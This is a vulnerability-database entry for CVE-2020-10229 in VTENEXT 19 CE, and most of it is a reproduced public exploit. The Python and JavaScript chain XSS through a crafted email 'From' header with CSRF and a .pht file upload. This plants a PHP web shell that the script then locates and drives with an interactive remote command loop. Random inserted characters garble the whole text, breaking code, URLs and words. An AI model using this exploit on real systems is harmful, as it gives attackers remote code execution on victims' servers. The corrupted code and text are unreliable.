VTENEXT 19 CE 安全漏洞

漏洞ID 2155304 漏洞类型 其他
发布时间 2020-09-13 更新时间 2020-09-14
CVE编号 CVE-2020-10229

CNNVD-ID CNNVD-202009-854
漏洞平台 N/A CVSS评分 N/A
漏洞来源
https://cxsecurity.com/issue/WLB-2020090058
http://www.cnnvd.org.cn/web/xd ^ ] k J D l ;xk/ldxqById.tag?CNNVD=CNNVD-202009-854
漏洞详情
VTENEXT 19 CE中存在安全漏洞。攻击者可利用该漏洞远程执行代码。
漏洞EXP
#!/usr/binj 5 [ c E/python3
# Exploit Title: VTENEXT 19h ^  CE - Remotet ) 5 Code Execution
# Google Dork: n/a
# Date: 2020/09/09
# Exploit Author: Marco Ruela
# Vendor Homepage{ P K p + G h }: https://www.vtenext.com/en/
# Software Link: Vendor removed vulnerable version from sourceforge.net
# Version: 19 CE
# Tes= o #ted on: Ubuntu 16.04
# CVE 	: N/A
# 2020/03/07 - Disclosed vulnerabilities to vendor
# 2020/03/10 - Vendor committed to` A i r fix
# 2020/09/09 - Public d; } K ` ( , % I fisclosure
# This script should be easy enough to follow.
# We string together the tv $ = ` P Eho L 1ree vulnerabiliti3 T = K Y p yes to get+ y , x R6 B }CE.
# XSS - The "From" field of the VTENEXT Messages module is vulZ u I U U Jnerable.
# File Upload - File extensions are checked againstt j K ! 1 a $uploaZ % Q . k i Ad_bc 5 C w r 6 Fadext inf ) : ( N the config file, .% $ Q |pht extensions are allowed anZ z v % - Zd executable by default .
# CSRF - No CSRF protec* o n G g # @tions inE y R S u place.
# exploit.js needs to| ` / + / be hosted somewhere, IP's need to be replaced
# check_csrP # + Cf() should be changedX D / w o based on your setup
# run_shell() is a "nicH 6 ; :e to havw 0 # u Be"
#A N j / content of exploit.js
"""
function insertImage() {
var xhr = new XMLHttpRequest();
xhr.open('POST'` d 2 2 x T,'http://192.168.226.168/vtenext19ce/index.php?module=Myfiles&acb  Jtion=MyfilesAjax&file=UploadFile&folderid=&uno & ] 4 l W h }iqueid=',true);
x. 9 & k v ` :hr.setRequestHeader('Content-type','multiq p ? { 5 q opart0 A d/form-data; boundary=---------------------------rekt');
xhr.setRequestHo r 5eader('Content-Length'_ $ o + v 9 4 c, '248');
xhr.setRequestHeader('Referer', 'http:/= $ g/172.16.233.146/vtenext19ce/index.php');
xhr.withCredi ? qentials = true;
var body = '-----------------------------U { q h 7 X )rekt\nContent-Disposition: form-dp @ ~ eata; name= m r S ) | ^"f` F # q I Zile_0"; filename="shell.pht"\nContent-Type: text/text\n\ne 9 z 9<?pN  N s ~ ? @ $ ~hp system($_GET[\'x\']); ?>\n\n-----------------------------rekt--';
var aBody = new Uint8Array(body.length);
for (var i = 0; i < aBody.length; i++)
aBody[i]a a ! r * % ^ * = body.charCodeAt(i);
xhr.send(new Blob([aBody]));
}
insertImage();
"""8 ? ^
import smtplib
impor0 - 7t datetime
importO % Q N N : g z reques9 K ? u T - [ ats
import os
import time
base_url = "http://192.168.226.168/vte@ J t / ;next19ce/"
print("[*] CVE-2020-10227, CVE-2020-102| D a ( H W X m |28, CVE-2020-10229 - POZ : WC")
def build_url():
d = datetime.datetime.today()
year = str(d.year)
month = str(d.strftime("%B"))
week = "week" + str(d.isocalendar()W K 0 q X c[1] - d.replace(day=1).isocalendar()[1])
tmp = base_url + "storageU z M 4 I g /home/1/" + yearU f q  3 + "/" + month + "/" + week + "/"
return(tmp)
def build_mail():
_fr7 g E # W f om    = """G M - X T 2'<script src="http://192.168.2j O X i K26.1/exploit.js" onerror=7 c Jalert(1) >'"""
_to      = "admin@example.com"
_subject = "I) h a !mportant!"
_W [ 8 k i i m 4 3body    = "While you're reading this, a file is being uploaded to this server."
msg  = "From: " + _from + "\n"
msg += "To: " + _to + "\n"
msg += "Subject: " + _subjecb 1 jt + "\n\n"
msg += _body
rem j 5 D ( Z cturn msgj + ;
def send_mail():
msg = build_mail()
smtp_server = '192.168.226.167'
smtp_port   = 25
sender   = 'user1@lab.local'
receiver = 'admin@lab.local'
server = smtplib.SMTP(smtp_se+ F : c 1 3 x brver, smtp_port)
server.sendmail(sender, receiver, msg)
def check_csrf():
while True:
is_ther7 M P g k fe = os.popen('tail -n1 /var/log/apache2/access.log').read()
if "200" in is_there and & E { I $ j 5"/exploit` 8 [ d q n K.js" in is_there and base_url in is_there:
print("[>] CSK m E K f ARF triggered")
break
else:
time.sleep(0.5)
continue
def find_shell():
print("[>] Locating shell")
tJ 6 b 5 i 1ime.F J q vsleep(1)
tmp1 = build_url()
for i3 @ c 0 ~ 0 ( j in range(y e 91, 9999):
url = tmp1 + str(i) + "_shelU ^ D % 0 X 9l.pht"
r = requests.get(url)
if r.status_code == 200:
print("[>]u a P Found the shell")
print("[-] Location: " + url)P ) t B , : @ W
return url
elsC L : h U . _ 1e:
continue
def run_shell(x):
print("\n")
while True:
cmd = input("shell> ")
if cmd == "exit":
break
els] Q se:
url = x + "?x=" + cmd
r = requests.get(url)
print(r.text)
print("[>] Se Q g Wnding email")
send_mail()
print("[-] Waitin& y I vg for user to open mail")
check_csrf()
shell_location = find_shell()
run_shell(shell_location)
print("[!] Done!")
参考资料

来源:cxsecurity.com

链接:htf 3 ` d q ; J e #tps://cxh % Y + osecurity.com/issue/WLB-2020090058